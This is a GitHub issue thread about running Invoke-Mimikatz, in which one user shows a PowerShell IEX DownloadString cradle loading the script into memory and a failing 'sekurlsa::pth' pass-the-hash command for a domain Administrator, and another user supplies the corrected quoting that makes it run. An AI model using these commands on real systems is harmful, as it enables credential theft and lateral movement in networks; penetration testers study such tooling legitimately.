Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Missing argument "user" #16

Open
XemBryan opened this issue Sep 27, 2019 · 1 comment
Open

Missing argument "user" #16

XemBryan opened this issue Sep 27, 2019 · 1 comment

Comments

@XemBryan
Copy link

I'm loading to memory
IEX (New-Object Net.WebClient).DownloadString('C:\Users\aki\Desktop\new\Invoke-Mimikatz.ps1')
and then executing Invoke-Mimikatz pth with command:
PS C:\Users\Administrator> Invoke-Mimikatz -Command 'sekurlsa::pth /user:Administrator /domain:CISCO'
returns an error:
ERROR kuhl_m_sekurlsa_pth ; Missing argument : user
But the argument is there, I know I still not included Ntlm argument.
What is the correct way to include user?

@Raikia
Copy link

Raikia commented Oct 24, 2019

Invoke-Mimikatz -Command '"sekurlsa::pth /user:Administrator /domain:CISCO"'

That will work

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

2 participants